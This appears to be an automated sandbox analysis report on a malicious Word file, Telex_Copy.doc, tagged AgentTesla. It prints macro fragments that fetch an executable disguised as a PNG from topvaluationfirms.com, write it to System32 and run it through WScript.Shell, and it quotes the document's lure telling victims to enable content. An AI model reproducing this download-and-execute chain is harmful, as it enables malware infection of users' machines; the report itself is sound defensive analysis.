Edit tour

Windows Analysis Report
Telex_Copy.doc

Overview

General Information

Sample Name:	Telex_Copy.doc
Analysis ID:	879269
MD5:	211e6002d69560d311f90715736f76d6
SHA1:	98cb9639a3d5a0faee4ceaa4fe2cbdca8f8d31f8
SHA256:	91cf5e5060f254905b48d517addd966c3f43454de14c376e8cb3b45fbd3058c9
Tags:	AgentTesladoc
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA macro which may execute processes

Office process drops PE file

Downloads files with wrong headers with respect to MIME Content-Type

Machine Learning detection for sample

Document contains an embedded VBA with functions possibly related to HTTP operations

.NET source code contains potential unpacker

Document contains an embedded VBA macro with suspicious strings

Machine Learning detection for dropped file

Document exploit detected (process start blacklist hit)

Drops executables to the windows directory (C:\Windows) and starts them

Yara signature match

Creates files inside the system directory

Internet Provider seen in connection with other malware

Document contains an embedded VBA macro which executes code when the document is opened / closed

IP address seen in connection with other malware

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Document contains embedded VBA macros

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1188 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

TelexCopy.png (PID: 172 cmdline: TelexCopy.png MD5: C332F541894866C101840B77191EFAA8)

chrome.exe (PID: 1608 cmdline: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0 MD5: 6ACAE527E744C80997B25EF2A0485D5E)

chrome.exe (PID: 2600 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=968,1692114121093780899,121391818690164613,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1404 /prefetch:8 MD5: 6ACAE527E744C80997B25EF2A0485D5E)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\~DF27C1B5AE15FF2044.TMP	SUSP_VBA_FileSystem_Access	Detects suspicious VBA that writes to disk and is activated on document open	Florian Roth (Nextron Systems)	0x7408:$s1: \Common Files\Microsoft Shared\ 0x3595:$s2: Scripting.FileSystemObject 0x3d0c:$a1: Document_Open 0x7950:$a1: Document_Open 0x7c6c:$a1: Document_Open 0x97db:$a1: Document_Open 0x3d9b:$a2: WScript.Shell

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Telex_Copy.doc	ReversingLabs: Detection: 37%
Source: Telex_Copy.doc	Virustotal: Detection: 63%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: Telex_Copy.doc

Avira: detected

Antivirus detection for URL or domain

Source: http://topvaluationfirms.com/TelexCopy.png	Avira URL Cloud: Label: phishing
Source: http://topvaluationfirms.com/TelexCop	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Windows\System32\TelexCopy.png	Avira: detection malicious, Label: HEUR/AGEN.1308640
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png	Avira: detection malicious, Label: HEUR/AGEN.1308640

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png	ReversingLabs: Detection: 54%
Source: C:\Windows\System32\TelexCopy.png	ReversingLabs: Detection: 54%

Machine Learning detection for sample

Source: Telex_Copy.doc

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Windows\System32\TelexCopy.png	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png	Joe Sandbox ML: detected

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/samples/browse/	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/samples/browse/	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/samples/browse/	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/samples/browse/	HTTP Parser: No favicon

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: TelexCopy[1].png.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\TelexCopy.png

Networking

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

Image file has PE prefix: HTTP/1.1 200 OK Date: Wed, 31 May 2023 15:08:22 GMT Content-Type: image/png Content-Length: 329216 Connection: keep-alive Last-Modified: Wed, 31 May 2023 01:50:18 GMT ETag: "6476a7da-50600" Cache-Control: public, max-age=31536000 Vary: Accept-Encoding Access-Control-Allow-Origin: * CF-Cache-Status: HIT Age: 46480 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s9mz2FnYC%2FRu3o5uEqWV5A0Eh8G4IdIueQOHMgZi1UaiJlHSqs1%2BR6CE69aNU31A8KgtPqYrrH02E00Y5mKwZt0t9S21q48bJAPvcUdWhM2Q1Wp53DtOqFWojSHsiAcuxYoxae6JjUg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7d0021c34c3f18bd-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 78 76 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 04 00 00 0a 00 00 00 00 00 00 0e 18 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 17 05 00 57 00 00 00 00 20 05 00 1a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 f8 04 00 00 20 00 00 00 fa 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1a 06 00 00 00 20 05 00 00 08 00 00 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 17 05 00 00 00 00 00 48 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode. $PELxvd0 @ ``W @ H.text `.rsrc @@.reloc@@BH

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	IP Address: 188.114.96.7 188.114.96.7
Source: Joe Sandbox View	IP Address: 188.114.96.7 188.114.96.7

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 31 May 2023 15:08:22 GMTContent-Type: image/pngContent-Length: 329216Connection: keep-aliveLast-Modified: Wed, 31 May 2023 01:50:18 GMTETag: "6476a7da-50600"Cache-Control: public, max-age=31536000Vary: Accept-EncodingAccess-Control-Allow-Origin: *CF-Cache-Status: HITAge: 46480Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s9mz2FnYC%2FRu3o5uEqWV5A0Eh8G4IdIueQOHMgZi1UaiJlHSqs1%2BR6CE69aNU31A8KgtPqYrrH02E00Y5mKwZt0t9S21q48bJAPvcUdWhM2Q1Wp53DtOqFWojSHsiAcuxYoxae6JjUg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7d0021c34c3f18bd-FRAalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 78 76 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 04 00 00 0a 00 00 00 00 00 00 0e 18 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 17 05 00 57 00 00 00 00 20 05 00 1a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 f8 04 00 00 20 00 00 00 fa 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1a 06 00 00 00 20 05 00 00 08 00 00 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 17 05 00 00 00 00 00 48 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxvd0 @ ``W @ H.text `.rsrc @@.reloc@@BH

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443

Source: Telex_Copy.doc	String found in binary or memory: http://topvaluationfirms.com/TelexCop
Source: ~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp.0.dr	String found in binary or memory: http://topvaluationfirms.com/TelexCopy.png

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=WP.289365

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7CAC9BC-1140-4E43-A415-F39DE2B8E989}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: topvaluationfirms.com

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-84.0.4147.135Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: bgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-84.0.4147.135Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveIf-Modified-Since: Tue, 16 May 2023 17:35:05 GMTUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36If-None-Match: 0x8DB5633E2D59C23Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/en-us/samples/browse/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /TelexCopy.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topvaluationfirms.comConnection: Keep-Alive

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8	Screenshot OCR: Enable editing" at the top yellow bar, and then click "Enable content" S C O I @ 100% G)
Source: Screenshot number: 8	Screenshot OCR: Enable content" S C O I @ 100% G) A GE)
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" at the top yellow bar, and then click "Enable content"
Source: Document image extraction number: 0	Screenshot OCR: Enable content"
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" at the top yellow bar, and then click "Enable content"
Source: Document image extraction number: 1	Screenshot OCR: Enable content"

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: Telex_Copy.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API IXMLHTTPRequest.Open("GET","http://topvaluationfirms.com/TelexCopy.png",False)	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API Stream.Open()	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API Stream.write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc0?\x04?\x00\x00\x00?\x05 \x00 \x05\x00@ \x00?\x00\x04\x00\x00\x00\x06\x00\x00\x00?\x05?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x05W\x00 \x05?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x05\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x04 \x00?\x04?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00 \x05?\x00?\x04\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x05\x00\x00H\x00\x02\x05?\x04?\x00\x03\x00\x0b??\x00?\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??\x01??\x14?\x00?\x03????\x17?\xfffd\x00??\x18??U\x00?\x19????\x02??\x14?\x00??????\x00??\x00??\x00\x06???\x00??\x02?j??\x00??\x1b??\x14?\x00?\x1c??&?\x13???k??\x0b?\x07??\x00?"?.?????\x00?/???\x00??\x00??\x00\x06??Z\x00\x06?????\x00?D???\x00??\x00??\x00\x06???\x00?k???\x00\x06??\x00?#??\x00???\x02?j??\x00??I??\x14?\x00?9??V?H??\x00?6????\x02?j??\x00??L??\x14?\x00????V?K??\x00?<????N??u??\x00??\x02?j??\x00??Q??\x14?\x00?T??&?D??N?k??\x01?\x19??&?B??\xfffd????\xfffd???\x00??\x00????\xfffd??N????\x01?\x19????\x02?j??\x00?????\x14?\x00?Z??V????\x00?W????\x02?j??\x00?????\x14?\x00?c??&?^??&?]???e??\x00???\x00??\xfffd?\x00???\x00???\x00??\x00?\xfffd??\x00???\x00?\x02+\x00\x01?`??\x01???????Z\x00?\x15?\x00^?\x00]\x03L\x00\x02??\x1a??\x1b??\x1c??\x1d????\x00?\x1e???\x1f??\x00???\x00????"??\x00?\x07??\x00???\x00??%?\x00??\x00????)A?????\x00?'????\x04??\x00?)?????\x00?\xfffd??\x00?-??\x00??\x00?+??\x00?,??\x00??/?????\x00?\xfffd??\x00????\x00?\xfffd??\x00?-??\x00?\x06???\x00?\x06??\x00\x00?\x00\x02=??\x00\x00?\x04H\x00\x03??3??4???\x00\xfffd?\x00?7???8???9???\x00????\x00??????\x01\x0f\x00\x04??:???\x00??\x02+\x00\x01?`??\x02????????\x00?\x15?\x00^?\x00?\x03?\x00\x00\x00??\x00?\x03??>??\x00??\x00?\x05??@??\x00??\x00?\x07??A???\x00??\x00?\x03????\x00?D???\x00?\xfffd??\x00?\x03????\x00?G???\x00??\x00?\x03??\x00?\x19???\x00???C??\x00?\x04??\x00?E???\x00??\x00?\x04????\x00?G???\x00??\x00?\x05??\x01??\x00?D???\x00?E??\x00?\x05????\x00?G???\x00??\x00?\x05??\x01?\x19???\x00??\x00?\x05???\x00?K??\x00?\x06??M???\x00??\x00?\x06??\x00?P???\x00???C??\x00?\x06??\x01?E???\x00 ?\x00?\x02?F??\x00?\x06??H???\x00 \xfffd\x00??\x00?D???\x00?R??\x00?\x07????\x00?G???\x00??H???\x00??\x00?\x07???\x00?K??\x00?\x00?"??Q??\x00??\x00 ?\x00?\x02?F??\x00?T??\x07??\x00?T??\x06??\x00?T??\x03??\x00?T??\x04??\x00?T??\x05??\x00?\xfffd??\x00?\xfffd??\x00??\x05??\x00?V???W???\x00\x00?]\x00\x05?????\x00??\x00??z??\x00?????\x00??\???]?????A\x00??\x08A??\x00??\x00?\x04\x00?\x01?\x00\x00	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ADODB.Stream' functions open, savetofile, write	Name: Document_Open
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	Stream path 'VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write

Document contains an embedded VBA macro which may execute processes

Source: ~DF27C1B5AE15FF2044.TMP.0.dr

OLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Windows\System32\TelexCopy.png			Jump to dropped file

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: Telex_Copy.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'XMLHttpRequest' functions response, responsebody, open, send	Name: Document_Open
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	Stream path 'VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send

Document contains an embedded VBA macro with suspicious strings

Source: Telex_Copy.doc	OLE, VBA macro line: WNE = "WScript.Shell"
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: WNE = "WScript.Shell"	Name: Document_Open
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: WNE = "WScript.Shell"

Source: C:\Users\user\AppData\Local\Temp\~DF27C1B5AE15FF2044.TMP, type: DROPPED

Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth (Nextron Systems), description = Detects suspicious VBA that writes to disk and is activated on document open, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc, reference = Internal Research

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Windows\System32\TelexCopy.png

Jump to behavior

Source: Telex_Copy.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_3__ob 37, gFx17LOa, EWA, U, False
Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_0__ob 46, lS8slOu6

Source: ~DF27C1B5AE15FF2044.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Telex_Copy.doc	OLE indicator, VBA macros: true
